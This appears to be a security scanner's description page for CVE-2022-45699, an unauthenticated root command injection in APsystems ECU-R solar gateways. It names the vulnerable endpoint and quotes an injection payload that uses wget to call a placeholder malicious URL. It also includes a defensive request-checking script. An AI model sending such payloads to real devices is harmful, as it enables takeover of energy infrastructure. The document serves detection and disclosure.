CVE-2022-45699 Scanner

CVE-2022-45699 Scanner – Detects command injection via timezone parameter in APsystems ECU-R v5203

Short Info


Level: Critical
Single Scan: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 8 days 6 hours
Scan only one: Domain, Subdomain, IPv4
Toolbox: -

APsystems ECU-R is an energy monitoring and communication device used in photovoltaic (solar power) systems. It manages and communicates with microinverters to monitor system performance. These devices are typically exposed on local or remote networks for administrative access.

This scanner targets a critical remote command injection vulnerability (CVE-2022-45699) present in ECU-R firmware version 5203. The flaw resides in the administration web interface, specifically the `/index.php/management/set_timezone` endpoint. The `timezone` parameter is improperly sanitized, allowing remote, unauthenticated attackers to inject and execute arbitrary system commands as **root**.

Exploitation involves sending a crafted POST request with a payload injected into the `timezone` field (e.g., `timezone=;wget+malicious-url;#`). This payload is directly interpreted by the system shell, leading to full remote code execution. The scanner confirms exploitation via [interactsh](https://github.com/projectdiscovery/interactsh) integration by checking for out-of-band HTTP interactions.
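A defender's check for the request shape described above, as an added example that is not part of the original page or the scanner's own code: it flags POSTs to `/index.php/management/set_timezone` whose `timezone` value is not shaped like a zone name, for use on captured or proxied requests. The function names, the zone-name pattern and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/index.php/management/set_timezone"  # path named on the page
# Assumption: legitimate values look like IANA zone names, e.g. "Europe/Berlin".
TZ_SHAPE = re.compile(r"[A-Za-z0-9_+-]{1,32}(/[A-Za-z0-9_+-]{1,32}){0,2}")

_HDRS = "Host: ecu.example\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
# Constructed sample requests; the second body is the payload shape quoted on the page.
SAMPLES = [
    "POST /index.php/management/set_timezone HTTP/1.1\r\n" + _HDRS + "timezone=Europe%2FBerlin",
    "POST /index.php/management/set_timezone HTTP/1.1\r\n" + _HDRS + "timezone=;wget+malicious-url;#",
    "GET /index.php/home HTTP/1.1\r\nHost: ecu.example\r\n\r\n",
]


def check_request(raw):
    """Return a reason string if the request looks like injection, else None."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0].split(" ")
    if len(request_line) < 2:
        return None  # not a parseable HTTP request line
    method, target = request_line[0], request_line[1]
    if method.upper() != "POST" or urlsplit(target).path.rstrip("/") != ENDPOINT:
        return None  # only the set_timezone POST is in scope
    # parse_qs decodes "+" and %XX, so encoded shell metacharacters are compared in clear.
    values = parse_qs(body, keep_blank_values=True).get("timezone", [])
    if not values:
        return "set_timezone POST without a timezone field"
    for value in values:
        # Allowlist on shape: anything that is not a plain zone name is reported.
        if not TZ_SHAPE.fullmatch(value):
            return "timezone value is not a zone name: %r" % value
    return None


def scan(requests):
    """Return (index, reason) for every request that check_request flags."""
    hits = []
    for index, raw in enumerate(requests):
        reason = check_request(raw)
        if reason is not None:
            hits.append((index, reason))
    return hits


if __name__ == "__main__":
    for index, reason in scan(SAMPLES):
        print("request %d: %s" % (index, reason))
```

The same shape allowlist is what the server-side handler would need before the value reaches a shell; matching on a blocklist of metacharacters instead would miss encodings the allowlist rejects by default.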

Successful exploitation can result in full device compromise, including modification of configurations, installation of backdoors, and pivoting within the local network. Because the device is often deployed in critical energy infrastructure, this vulnerability poses a significant security risk.
